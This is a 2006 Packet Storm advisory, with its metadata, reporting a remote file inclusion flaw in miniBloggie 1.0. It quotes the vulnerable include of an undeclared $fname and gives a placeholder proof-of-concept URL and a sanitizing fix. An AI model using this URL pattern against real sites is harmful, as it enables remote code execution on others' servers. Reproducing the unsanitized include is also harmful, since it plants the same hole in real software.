ID PACKETSTORM:49258 Type packetstorm Reporter Sh3ll Modified 2006-08-27T00:00:00
Description
`---------------------------------------------------------------------------------------
miniBloggie 1.0 fname Remote File Inclusion
---------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/05/01
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
---------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : miniBloggie
version : 1.0
Venedor : http://www.mywebland.com
Class : Remote File Inclusion
Risk : High
Summary : minibloggie, a mini blog script yet effective built using fast template
for easy customisation. Using Mysql database system with edit, delete, , support smiley
& BBcode, adminstrator log in for easy website management.
---------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Exists Is in The cls_fast_template.php When Used The Variable in a $fname
include() Function Without Being Declared.
---------------------------------cls_fast_template.php---------------------------------
....
<?php
else {
fclose($fp);
include $fname;
return;
}
...
---------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]
Solution:
~~~~~~~~
Sanitize Variabel $fname in cls_fast_template.php
----------------------------------------------------------------------------------------
Note:
~~~~
Venedor Contacted, But No Response. So Do a Dirty Patch.
----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
`
{"hash": "30b6a96b20cd6f90d15b4b4928d41debbe7485fd5c3c29d795b0aa6bd32198e1", "sourceHref": "https://packetstormsecurity.com/files/download/49258/miniBloggie10.txt", "title": "miniBloggie10.txt", "id": "PACKETSTORM:49258", "published": "2006-08-27T00:00:00", "description": "", "modified": "2006-08-27T00:00:00", "sourceData": "`--------------------------------------------------------------------------------------- \nminiBloggie 1.0 fname Remote File Inclusion \n--------------------------------------------------------------------------------------- \nAuthor : Sh3ll \nDate : 2006/05/01 \nHomePage : http://www.sh3ll.ir \nContact : sh3ll[at]sh3ll[dot]ir \n--------------------------------------------------------------------------------------- \nAffected Software Description: \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nApplication : miniBloggie \nversion : 1.0 \nVenedor : http://www.mywebland.com \nClass : Remote File Inclusion \nRisk : High \nSummary : minibloggie, a mini blog script yet effective built using fast template \nfor easy customisation. Using Mysql database system with edit, delete, , support smiley \n& BBcode, adminstrator log in for easy website management. \n \n--------------------------------------------------------------------------------------- \nVulnerability: \n~~~~~~~~~~~~~ \nThe Problem Exists Is in The cls_fast_template.php When Used The Variable in a $fname \ninclude() Function Without Being Declared. \n---------------------------------cls_fast_template.php--------------------------------- \n.... \n<?php \nelse { \nfclose($fp); \ninclude $fname; \nreturn; \n} \n... \n--------------------------------------------------------------------------------------- \nPoC: \n~~~ \nhttp://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script] \n \nSolution: \n~~~~~~~~ \nSanitize Variabel $fname in cls_fast_template.php \n---------------------------------------------------------------------------------------- \nNote: \n~~~~ \nVenedor Contacted, But No Response. So Do a Dirty Patch. \n---------------------------------------------------------------------------------------- \nShoutz: \n~~~~~~ \n~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena \n~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams \n`\n", "reporter": "Sh3ll", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "7e64fc03dc699574cf5c85b1c178245b"}, {"key": "modified", "hash": "7a76a9349280729118a24fd6ca66d44c"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "7a76a9349280729118a24fd6ca66d44c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "f2500699b6e5faec5306dd8f78a85d5e"}, {"key": "sourceData", "hash": "84302f5df408b3839113948c8c59a9ee"}, {"key": "sourceHref", "hash": "2cb24c5b4a44d9b019b0f49976f1da48"}, {"key": "title", "hash": "7d5d1ddf582167b5ce08a66fc613d277"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/49258/miniBloggie10.txt.html", "lastseen": "2016-11-03T10:29:33", "viewCount": 0, "enchantments": {"vulnersScore": 4.3}}